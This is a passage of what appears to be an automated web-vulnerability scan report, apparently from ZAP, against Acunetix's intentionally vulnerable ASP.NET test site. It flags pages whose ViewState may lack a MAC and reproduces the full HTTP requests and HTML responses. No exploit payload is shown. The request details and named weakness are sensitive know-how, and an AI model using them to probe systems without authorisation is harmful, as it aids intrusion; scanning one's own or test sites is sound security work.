          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        13. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's ViewState, but possibly without a MAC.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1197
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1197 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13281
          
          
          Response body (13281 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        14. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's ViewState, but possibly without a MAC.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdm
lzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz